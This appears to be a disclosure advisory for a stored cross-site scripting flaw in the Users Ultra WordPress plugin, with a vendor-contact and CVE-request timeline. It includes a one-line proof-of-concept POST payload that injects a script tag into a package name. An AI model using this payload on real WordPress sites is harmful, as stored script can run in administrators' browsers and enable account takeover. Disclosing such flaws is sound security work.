Users Ultra [Persistence XSS]

WordPress plugin Users Ultra suffers for an Persistence XSS vulnerability.


Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is taking place before saving package details in DB. This allows a malicious user to include JS code in package name and/or package description.


  • Send a post request to with data: action=package_add_new&p_name=a<script>alert(1)</script>
  • Visit as admin or go to the page that contains package information at front end.

  • 2015-10-20:
    Requested CVE ID
  • 2015-10-29:
    Vendor notified via email
  • 2015-11-11:
    Requested CVE ID (no response from 2015-10-20)
  • 2015-11-11:
    Vendor notified via contact form in his website
  • 2015-11-13:
    Vendor notified via support forums at
  • 2015-11-14:
    Vendor responded and received report through email
  • 2016-02-06:
    Requested CVE ID (no response from 2015-11-11)